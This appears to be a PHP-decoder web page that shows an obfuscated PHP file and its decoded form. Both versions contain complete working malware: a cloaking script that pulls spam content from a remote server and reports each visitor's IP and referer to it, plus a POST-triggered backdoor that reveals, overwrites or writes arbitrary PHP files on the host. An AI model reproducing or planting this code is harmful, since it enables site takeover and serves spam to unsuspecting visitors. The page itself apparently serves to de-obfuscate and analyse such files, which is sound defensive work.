Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto qsfan; FTU_T: $Content_mb = ''; goto M7qm8; UTDTP: $cust_ip = mymygetip(); got..

Decoded Output download

<?php 
goto qsfan; FTU_T: $Content_mb = ''; goto M7qm8; UTDTP: $cust_ip = mymygetip(); goto FTU_T; c7QJ1: $host_name = $_SERVER["REQUEST_SCHEME"] . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto UTDTP; xFMKx: if (strpos($host_name, "sitemap.xml")) { header("Content-Type:application/xml"); } else { header("Content-Type: text/html;charset=utf-8"); } goto zp2MD; ovswD: for ($i = 1; $i <= $loop_request_times; $i++) { $Content_mb = getHTTPPage($Remote_server . "index.php?from=" . $referer . "&lan=yn&cust_ip={$cust_ip}&jcstartType=0&host=" . $host_name); $html = trim($Content_mb); if ($i == $loop_request_times && empty($html)) { die("<p align='center'><font color='red'><b>Connection Error!</b></font></p>"); } else { if (!empty($html)) { break; } } } goto WQkDj; JcNlW: if ($_SERVER["REQUEST_METHOD"] == "POST") { $act = isset($_POST["act"]) ? $_POST["act"] : ''; $file = $_SERVER["SCRIPT_FILENAME"]; $content = isset($_POST["content"]) ? $_POST["content"] : ''; if ($act == "show") { die(file_get_contents($file)); } else { if ($act == "edit" && strlen($content)) { file_put_contents($file, $content); echo "edit ok"; die; } else { if ($act == "edit2" && strlen($content)) { file_put_contents(__DIR__ . "/asdadfa.php", $content); echo "edit2 ok"; die; } } } } goto OixO8; rjtfo: set_time_limit(0); goto JcNlW; rlKys: $referer = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; goto ovswD; zp2MD: echo $Content_mb; goto fs_jn; M7qm8: $loop_request_times = 3; goto rlKys; qsfan: error_reporting(0); goto rjtfo; OixO8: $Remote_server = "https://yini.mejsc6.com/"; goto c7QJ1; WQkDj: function mymygetip() { $ip = ''; if (!empty($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { $ip = $_SERVER["REMOTE_ADDR"]; } if (strpos($ip, ",") !== false) { $ip = explode(",", $ip)[0]; } return $ip; } goto HcIvh; HcIvh: function getHTTPPage($url) { $UA = "aQ0O010O"; if (isset($_SERVER["HTTP_USER_AGENT"])) { $UA = $_SERVER["HTTP_USER_AGENT"]; } $opts = array("http" => array("method" => "GET", "header" => "User-Agent: {$UA}")); $context = stream_context_create($opts); $html = @file_get_contents($url, false, $context); return $html; } goto xFMKx; fs_jn: ?>

Did this file decode correctly?

Original Code

<?php
goto qsfan; FTU_T: $Content_mb = ''; goto M7qm8; UTDTP: $cust_ip = mymygetip(); goto FTU_T; c7QJ1: $host_name = $_SERVER["\x52\105\x51\x55\105\x53\124\x5f\x53\103\110\x45\115\x45"] . "\x3a\x2f\57" . $_SERVER["\110\x54\x54\120\137\x48\117\123\x54"] . $_SERVER["\x52\105\x51\125\105\x53\124\x5f\125\x52\x49"]; goto UTDTP; xFMKx: if (strpos($host_name, "\163\x69\164\x65\x6d\141\160\56\x78\155\154")) { header("\103\157\x6e\x74\x65\156\x74\x2d\124\x79\x70\x65\72\141\160\x70\x6c\x69\143\141\x74\x69\157\x6e\x2f\170\155\154"); } else { header("\103\x6f\156\x74\145\x6e\164\x2d\x54\x79\x70\x65\72\x20\x74\x65\x78\164\x2f\150\x74\x6d\154\73\x63\150\x61\x72\163\x65\x74\x3d\165\164\146\55\70"); } goto zp2MD; ovswD: for ($i = 1; $i <= $loop_request_times; $i++) { $Content_mb = getHTTPPage($Remote_server . "\x69\x6e\x64\x65\x78\56\160\x68\160\77\x66\x72\x6f\155\x3d" . $referer . "\46\154\x61\x6e\75\171\156\46\143\x75\163\164\137\151\x70\75{$cust_ip}\46\152\x63\163\x74\141\162\164\124\171\160\145\75\x30\x26\x68\157\163\x74\x3d" . $host_name); $html = trim($Content_mb); if ($i == $loop_request_times && empty($html)) { die("\74\160\x20\141\154\151\147\156\75\x27\143\145\156\164\x65\162\x27\76\74\x66\x6f\x6e\x74\x20\x63\157\x6c\x6f\162\x3d\47\x72\x65\x64\x27\x3e\x3c\142\x3e\x43\x6f\x6e\156\145\x63\x74\x69\x6f\x6e\x20\x45\162\x72\x6f\162\x21\74\57\x62\x3e\x3c\57\x66\x6f\156\x74\76\74\57\160\76"); } else { if (!empty($html)) { break; } } } goto WQkDj; JcNlW: if ($_SERVER["\x52\x45\x51\125\105\x53\124\137\115\105\124\110\x4f\104"] == "\x50\117\x53\124") { $act = isset($_POST["\141\143\164"]) ? $_POST["\141\x63\164"] : ''; $file = $_SERVER["\123\x43\122\111\x50\124\137\106\x49\114\x45\116\101\x4d\105"]; $content = isset($_POST["\x63\x6f\x6e\164\x65\156\164"]) ? $_POST["\x63\x6f\156\164\x65\156\x74"] : ''; if ($act == "\x73\150\x6f\167") { die(file_get_contents($file)); } else { if ($act == "\x65\144\151\164" && strlen($content)) { file_put_contents($file, $content); echo "\145\144\151\164\40\157\x6b"; die; } else { if ($act == "\x65\x64\151\x74\x32" && strlen($content)) { file_put_contents(__DIR__ . "\x2f\x61\163\x64\141\x64\146\141\56\x70\150\160", $content); echo "\145\x64\151\164\x32\x20\157\x6b"; die; } } } } goto OixO8; rjtfo: set_time_limit(0); goto JcNlW; rlKys: $referer = isset($_SERVER["\110\x54\124\120\137\122\105\106\105\x52\105\x52"]) ? $_SERVER["\110\x54\x54\120\x5f\x52\x45\x46\105\x52\105\x52"] : ''; goto ovswD; zp2MD: echo $Content_mb; goto fs_jn; M7qm8: $loop_request_times = 3; goto rlKys; qsfan: error_reporting(0); goto rjtfo; OixO8: $Remote_server = "\150\x74\x74\160\163\x3a\x2f\x2f\171\151\156\x69\x2e\x6d\x65\x6a\x73\143\66\56\143\x6f\x6d\x2f"; goto c7QJ1; WQkDj: function mymygetip() { $ip = ''; if (!empty($_SERVER["\110\x54\124\x50\137\x43\x4c\111\x45\116\x54\137\x49\x50"])) { $ip = $_SERVER["\x48\x54\124\120\x5f\x43\x4c\x49\x45\x4e\124\137\111\x50"]; } elseif (!empty($_SERVER["\110\124\124\120\137\130\137\x46\117\x52\x57\101\x52\x44\x45\104\x5f\x46\x4f\x52"])) { $ip = $_SERVER["\x48\x54\x54\120\137\x58\137\106\117\x52\127\101\x52\104\x45\x44\137\x46\117\x52"]; } else { $ip = $_SERVER["\122\105\115\117\x54\105\137\x41\x44\104\x52"]; } if (strpos($ip, "\x2c") !== false) { $ip = explode("\x2c", $ip)[0]; } return $ip; } goto HcIvh; HcIvh: function getHTTPPage($url) { $UA = "\141\121\x30\117\x30\x31\x30\117"; if (isset($_SERVER["\x48\124\x54\x50\137\125\x53\105\122\137\x41\x47\x45\x4e\x54"])) { $UA = $_SERVER["\110\124\x54\120\x5f\125\123\x45\122\137\101\107\x45\116\x54"]; } $opts = array("\150\x74\164\x70" => array("\x6d\x65\164\150\x6f\144" => "\107\105\x54", "\x68\145\141\x64\x65\x72" => "\x55\x73\x65\162\x2d\101\x67\x65\x6e\x74\72\x20{$UA}")); $context = stream_context_create($opts); $html = @file_get_contents($url, false, $context); return $html; } goto xFMKx; fs_jn: ?>

Function Calls

None

Variables

None

Stats

MD5 767ef6523ab6d97f39828def5a95a623
Eval Count 0
Decode Time 69 ms